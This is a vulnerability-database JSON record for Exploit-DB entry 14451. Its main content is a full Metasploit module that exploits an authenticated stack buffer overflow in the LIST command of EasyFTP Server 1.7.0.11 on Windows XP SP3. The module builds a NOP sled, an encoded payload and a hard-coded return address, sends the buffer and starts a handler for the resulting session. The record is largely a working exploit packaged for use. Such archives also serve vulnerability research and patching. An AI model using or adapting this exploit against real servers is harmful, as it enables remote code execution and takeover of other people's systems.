{"id": "EDB-ID:14451", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "EasyFTP Server 1.7.0.11 - 'LIST' (Authenticated) Remote Buffer Overflow (Metasploit)", "description": "", "published": "2010-07-23T00:00:00", "modified": "2010-07-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/14451", "reporter": "Muhamad Fadzil Ramli", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-08-16T04:56:39", "viewCount": 11, "enchantments": {"score": {"value": 1.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:14400"]}]}, "exploitation": null, "vulnersScore": 1.0}, "_state": {"dependencies": 1661182887, "score": 1661184847}, "_internal": {"score_hash": "9e77a1c7f89b1f91189715684b39d1d6"}, "sourceHref": "https://www.exploit-db.com/download/14451", "sourceData": "##\r\n# EDB-ID: 14400\r\n# Date : July 5, 2010\r\n# Discovered by : Karn Ganeshen\r\n# Version : 1.7.0.11\r\n# Tested on : Windows XP SP3 Version 2002\r\n# MFR & VAS TEAM : just testing howto convert exploits to metasploit modules.\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Ftp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.\r\n\t\t\t\t\tcredit goes to Karn Ganeshan.\t\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Karn Ganeshan <karnganeshan [at] gmail.com>', # original version\r\n\t\t\t\t\t'MFR' # convert to metasploit format.\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => 'Version: 1',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'EDB', '14400' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread'\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 268,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x2f\\x5c\", \r\n\t\t\t\t\t'DisableNops' => false\r\n\t\t\t\t},\r\n\t\t\t'Platform'\t => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP3 - Version 2002', { 'Ret' => 0x7e49732b } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'July 5 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\t\tdisconnect\r\n\r\n\t\tif (banner =~ /BigFoolCat/)\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect_login\r\n\r\n\t\tbuf = ''\r\n\t\tbuf << make_nops(268 - payload.encoded.length - 4)\r\n\t\tprint_status(\"Adding the payload...\")\r\n\t\tbuf << payload.encoded\r\n\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\tprint_status(\"Sending exploit buffer...\")\r\n\t\tsend_cmd( ['LIST', buf] , false) \r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend", "osvdbidlist": [], "exploitType": "remote", "verified": true}
{}
EasyFTP Server 1.7.0.11 - 'LIST' (Authenticated) Remote Buffer Overflow (Metasploit)